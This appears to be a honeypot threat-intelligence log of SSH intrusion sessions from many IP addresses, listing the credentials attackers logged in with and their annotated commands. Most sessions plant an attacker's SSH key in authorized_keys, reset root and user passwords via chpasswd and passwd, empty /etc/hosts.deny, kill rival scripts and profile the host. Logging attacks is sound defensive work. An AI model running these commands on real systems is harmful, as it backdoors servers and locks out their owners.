$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—4
$ echo "root:mw4mFVMOaE8c"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ echo -e "1234!@#$\nuzFmuhVgD3zJ\nuzFmuhVgD3zJ"|passwd|bash
$ echo "1234!@#$\nuzFmuhVgD3zJ\nuzFmuhVgD3zJ\n"|passwd
$ echo "root:lRbZki3JENPe"|chpasswd|bash
🎭 yankee_root_27 (35.225.56.202) β€” Council Bluffs, United States Β· 3 sessions Β· 60 cmds
2026-05-27 21:12 EDT Β· as admin/fjbdfdjkdsfs541544, mgeweb/mgeweb, simon/simon
echo β†’ payload download from C2 β†’ execute from /tmp
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo -e "fjbdfdjkdsfs541544\nvQBHwOZUbusS\nvQBHwOZUbusS"|passwd|bash
$ Enter new UNIX password: Γ—3
$ echo "fjbdfdjkdsfs541544\nvQBHwOZUbusS\nvQBHwOZUbusS\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo -e "mgeweb\nM2Pnq1TDvcRF\nM2Pnq1TDvcRF"|passwd|bash
$ echo "mgeweb\nM2Pnq1TDvcRF\nM2Pnq1TDvcRF\n"|passwd
$ echo -e "simon\nFO837EsvdVlH\nFO837EsvdVlH"|passwd|bash
$ echo "simon\nFO837EsvdVlH\nFO837EsvdVlH\n"|passwd
🎭 cipher_root_48 (165.154.6.86) β€” Hong Kong, Hong Kong Β· 4 sessions Β· 43 cmds
2026-05-16 09:54 EDT Β· as admin/Password, root/QAZ123wsx456, root/warnightkardesim
echo β†’ payload download from C2 β†’ execute from /tmp
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—4 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—4 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:BuP4PuewYVQm"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "Password\nY3JpepzDhcoG\nY3JpepzDhcoG"|passwd|bash
$ Enter new UNIX password:
$ echo "Password\nY3JpepzDhcoG\nY3JpepzDhcoG\n"|passwd
🎭 specter_root_55 (41.216.178.119) β€” Jakarta, Indonesia Β· 2 sessions Β· 39 cmds
2026-05-27 20:59 EDT Β· as admin/Password, root/QAZ123wsx456
echo β†’ payload download from C2 β†’ execute from /tmp
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "Password\nb0B3KGjJc8yE\nb0B3KGjJc8yE"|passwd|bash
$ Enter new UNIX password:
$ echo "Password\nb0B3KGjJc8yE\nb0B3KGjJc8yE\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:N67OphcMoAzp"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
🎭 shogun_root_5 (43.165.190.208) β€” Tokyo, Japan Β· 2 sessions Β· 39 cmds
2026-05-27 20:58 EDT Β· as admin/Password, root/QAZ123wsx456
echo β†’ payload download from C2 β†’ execute from /tmp
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:vSRdmV4qXnbd"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "Password\n8TF4RtgllUh8\n8TF4RtgllUh8"|passwd|bash
$ Enter new UNIX password:
$ echo "Password\n8TF4RtgllUh8\n8TF4RtgllUh8\n"|passwd
🎭 star_root_27 (150.136.129.10) β€” Ashburn, United States Β· 1 session Β· 19 cmds
2026-05-27 21:11 EDT Β· as root/Server@2024
echo β†’ payload download from C2 β†’ execute from /tmp
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:eDuGYVDDpwki"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 dragon_root_15 (14.103.117.97) β€” Beijing, China Β· 1 session Β· 20 cmds
2026-05-27 21:01 EDT Β· as admin/Password
echo β†’ payload download from C2 β†’ execute from /tmp
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "Password\n4RzUu0avqhph\n4RzUu0avqhph"|passwd|bash
$ Enter new UNIX password:
$ echo "Password\n4RzUu0avqhph\n4RzUu0avqhph\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 lotus_root_12 (103.96.42.40) β€” Pune, India Β· 1 session Β· 19 cmds
2026-05-27 20:51 EDT Β· as root/iwYpKi9&oE36.923967E-3103Xy
echo β†’ payload download from C2 β†’ execute from /tmp
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:EUkhQBTri69Z"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 star_root_28 (209.74.86.219) β€” Los Angeles, United States Β· 1 session Β· 20 cmds
2026-05-27 19:55 EDT Β· as deploy/87654321
echo β†’ payload download from C2 β†’ execute from /tmp
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "87654321\n3VU7Nr5KRfMP\n3VU7Nr5KRfMP"|passwd|bash
$ Enter new UNIX password:
$ echo "87654321\n3VU7Nr5KRfMP\n3VU7Nr5KRfMP\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 rogue_root_57 (103.168.58.222) β€” Mai Dich, Vietnam Β· 2 sessions Β· 38 cmds
2026-05-27 19:30 EDT Β· as root/Www123123, root/qwerty111
echo β†’ payload download from C2 β†’ execute from /tmp
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:XQyUHQDATgwl"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:GfPCXkyCLVAJ"|chpasswd|bash
🎭 wraith_root_56 (43.245.97.82) β€” Singapore, Singapore Β· 6 sessions Β· 117 cmds
2026-05-09 18:42 EDT Β· as anand/anand, devops/devops@2025, root/Pa$$w0rd123!
echo β†’ payload download from C2 β†’ execute from /tmp
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—6 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—6 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—6 // CPU profiling
$ echo "root:AL4jd6wooqUt"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—3 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—6 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—6
$ ls -lh $(which ls) Γ—6
$ which ls Γ—6
$ crontab -l Γ—6 // persistence setup
$ w Γ—6 // logged-in users check
$ uname -m Γ—6
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—6 // CPU profiling
$ top Γ—6 // process monitoring
$ uname Γ—6 // OS identification
$ uname -a Γ—6 // OS/kernel identification
$ whoami Γ—6 // privilege check
$ lscpu | grep Model Γ—6
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—6
$ echo "root:KX6Dwxu3ZkvV"|chpasswd|bash
$ echo -e "anand\nCRXzqry8tUwW\nCRXzqry8tUwW"|passwd|bash
$ Enter new UNIX password: Γ—3
$ echo "anand\nCRXzqry8tUwW\nCRXzqry8tUwW\n"|passwd
$ echo -e "devops@2025\nWFqADkKuC4kd\nWFqADkKuC4kd"|passwd|bash
$ echo "devops@2025\nWFqADkKuC4kd\nWFqADkKuC4kd\n"|passwd
$ echo -e "fjbdfdjkdsfs541544AA@@\n9J7JO7YO06EB\n9J7JO7YO06EB"|passwd|bash
$ echo "fjbdfdjkdsfs541544AA@@\n9J7JO7YO06EB\n9J7JO7YO06EB\n"|passwd
$ echo "root:SqwG2X0hMVO5"|chpasswd|bash
🎭 burger_root_33 (199.195.254.215) β€” New York, United States Β· 3 sessions Β· 57 cmds
2026-05-24 01:31 EDT Β· as root/Www123123, root/ddd123, root/qwerty111
echo β†’ payload download from C2 β†’ execute from /tmp
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo "root:RyNV8YzDd1sG"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—3 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo "root:HqqNUfSS8zcO"|chpasswd|bash
$ echo "root:36C0ZFsov93s"|chpasswd|bash
🎭 cipher_root_49 (103.154.158.70) β€” Kafrul, Bangladesh Β· 2 sessions Β· 38 cmds
2026-05-27 19:29 EDT Β· as root/Www123123, root/qwerty111
echo β†’ payload download from C2 β†’ execute from /tmp
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:lmWcqvMEDKBW"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:G87HLfSwX2FS"|chpasswd|bash
🎭 cowboy_root_30 (135.237.122.43) β€” Boydton, United States Β· 2 sessions Β· 38 cmds
2026-05-27 19:28 EDT Β· as root/Www123123, root/qwerty111
echo β†’ payload download from C2 β†’ execute from /tmp
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:KEVJCRlUE0Sr"|chpasswd|bash
